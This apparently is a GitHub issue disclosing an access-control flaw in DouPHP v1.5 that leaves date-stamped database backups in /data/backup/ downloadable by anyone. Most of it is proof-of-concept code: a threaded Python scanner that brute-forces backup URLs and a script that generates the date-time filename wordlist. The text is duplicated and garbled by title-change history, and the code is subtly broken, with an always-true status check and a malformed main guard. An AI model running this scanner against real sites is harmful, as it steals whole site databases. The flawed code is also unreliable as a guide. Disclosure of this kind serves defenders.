The latest version of DouPHP v1.5 Release 20190516, the background can back up the entire station data, but does not have access control on the backup file, resulting in any user can view or now the database file.
1、Log in to the background and back up data through the data backup function,And generate a sql file in the format of the date.
3、Any user can access the backup file path through the url, and can view the download backup file.
4、Backup file generation format (current date and time format file).
5、follow up ROOT_PATH,Check the core file and make no access restrictions on the backup file, resulting in a vulnerability. .
6、POC (Dict.txt needs to be customized to generate a dictionary in time format)。
import urllib.request
import time
import threading
def search_url(url,txt):
with open(txt,'r') as f:
for each in f:
each = each.replace('\n','')
urllist = url + each +'.sql'
all_url.append(urllist)
def handle_url(urllist):
print("Find:"+urllist+'\n')
try:
req = urllib.request.urlopen(urllist)
#Judgment return code
if req.getcode()==200 or 304:
open_url.append(urllist)
print("[+]Find file:"+urllist+'\n')
if req.getcode()==304:
print("[+]Find file:"+urllist+'\n')
open_url.append(urllist)
except:
pass
def main():
search_url(url,txt)
for each in all_url:
t = threading.Thread(target = handle_url,args=(each,))
threads.append(t)
t.start()
for t in threads:
t.join()
if open_url:
print("Successful scan, successful url::")
for each in open_url:
print("[+]"+each)
else:
print("There is a scan to the background of the website (maybe the dictionary is not enough to force)")
if name=="main":
#Judge program run time
start = time.clock()
main()
end = time.clock()
print("The function spend time is %.3f seconds" %(end-start))
7、Generate a specific date dictionary file script
import time
#Can be customized
for h in range(15,16):
for i in range(0,61):
for s in range(0,61):
if(h==0 and i==0 and s==0):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+str(s)+'0',time.localtime(time.time()))
# print(data)
elif h==0 and i==0 and (s>0 and s<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
elif h==0 and i==0 and (s>=10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+str(s),time.localtime(time.time()))
# print(data)
elif h==0 and (i>=10) and (s>0 and s<9):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+str(i)+'0'+str(s),time.localtime(time.time()))
elif i==0 and s==0 and (h>0 and h<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
# print(data)
elif h==0 and ((i>0 and i<10)) and (s>0 and s<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
elif h==0 and s==0 and (i>0 and i<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
elif h==0 and i==0 and (s>=10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+str(s),time.localtime(time.time()))
#print(data)
elif h==0 and (i>0 and i<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+str(s),time.localtime(time.time()))
#print(data)
elif h==0 and (i>0 and i<10) and (s>0 and s<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
# print(data)
elif h==0 and (i>0 and i<10) and (s>0 and s<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
#print(data)
elif (h>0 and h<10) and (i>0 and i<10) and (s>0 and s<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
#print(data)
elif (h>0 and h<10) and (s>0 and s<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+str(i)+'0'+str(s),time.localtime(time.time()))
#print(data)
elif (h>0 and h<10) and (s>0 and s<10) and (i>0 and i<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
#print(data)
else:
data=time.strftime('D%Y%m%dT'+str(h)+str(i)+str(s),time.localtime(time.time()))
print(data)
The text was updated successfully, but these errors were encountered:
srsec
changed the title
Any user can view or now, the whole station database backup file
失效的身份认证漏洞,任意用户可以查看下载数据库备份文件
May 22, 2019
srsec
changed the title
失效的身份认证漏洞,任意用户可以查看下载数据库备份文件
Shīxiào de shēnfèn rènzhèng lòudòng, rènyì yònghù kěyǐ chákàn xiàzài shùjùkù bèifèn wénjiàn 27/5000 Invalid identity authentication vulnerability, any user can view the download database backup file
May 22, 2019
srsec
changed the title
Shīxiào de shēnfèn rènzhèng lòudòng, rènyì yònghù kěyǐ chákàn xiàzài shùjùkù bèifèn wénjiàn 27/5000 Invalid identity authentication vulnerability, any user can view the download database backup file
Invalid identity authentication vulnerability, any user can view the download database backup file
May 22, 2019
The latest version of DouPHP v1.5 Release 20190516, the background can back up the entire station data, but does not have access control on the backup file, resulting in any user can view or now the database file.
1、Log in to the background and back up data through the data backup function,And generate a sql file in the format of the date.
2、We look at the path generated by the backup file.http://url/data/backup/D20190522T154247.sql
3、Any user can access the backup file path through the url, and can view the download backup file.
4、Backup file generation format (current date and time format file).

5、follow up ROOT_PATH,Check the core file and make no access restrictions on the backup file, resulting in a vulnerability.
6、POC (Dict.txt needs to be customized to generate a dictionary in time format)。
import urllib.request
import time
import threading
url = input("url:")
txt = input("dict(dict.txt):")
open_url = []
all_url = []
threads = []
#Can be customized
def search_url(url,txt):
with open(txt,'r') as f:
for each in f:
each = each.replace('\n','')
urllist = url + each +'.sql'
all_url.append(urllist)
def handle_url(urllist):
print("Find:"+urllist+'\n')
try:
req = urllib.request.urlopen(urllist)
#Judgment return code
if req.getcode()==200 or 304:
open_url.append(urllist)
print("[+]Find file:"+urllist+'\n')
if req.getcode()==304:
print("[+]Find file:"+urllist+'\n')
open_url.append(urllist)
except:
pass
def main():
search_url(url,txt)
if name=="main":
#Judge program run time
start = time.clock()
main()
end = time.clock()
print("The function spend time is %.3f seconds" %(end-start))
7、Generate a specific date dictionary file script
import time
#Can be customized
for h in range(15,16):
for i in range(0,61):
for s in range(0,61):
if(h==0 and i==0 and s==0):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+str(s)+'0',time.localtime(time.time()))
# print(data)
elif h==0 and i==0 and (s>0 and s<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
elif h==0 and i==0 and (s>=10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+str(s),time.localtime(time.time()))
# print(data)
elif h==0 and (i>=10) and (s>0 and s<9):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+str(i)+'0'+str(s),time.localtime(time.time()))
elif i==0 and s==0 and (h>0 and h<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
# print(data)
elif h==0 and ((i>0 and i<10)) and (s>0 and s<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
elif h==0 and s==0 and (i>0 and i<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
elif h==0 and i==0 and (s>=10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+str(s),time.localtime(time.time()))
#print(data)
elif h==0 and (i>0 and i<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+str(s),time.localtime(time.time()))
#print(data)
elif h==0 and (i>0 and i<10) and (s>0 and s<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
# print(data)
elif h==0 and (i>0 and i<10) and (s>0 and s<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
#print(data)
elif (h>0 and h<10) and (i>0 and i<10) and (s>0 and s<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
#print(data)
The text was updated successfully, but these errors were encountered: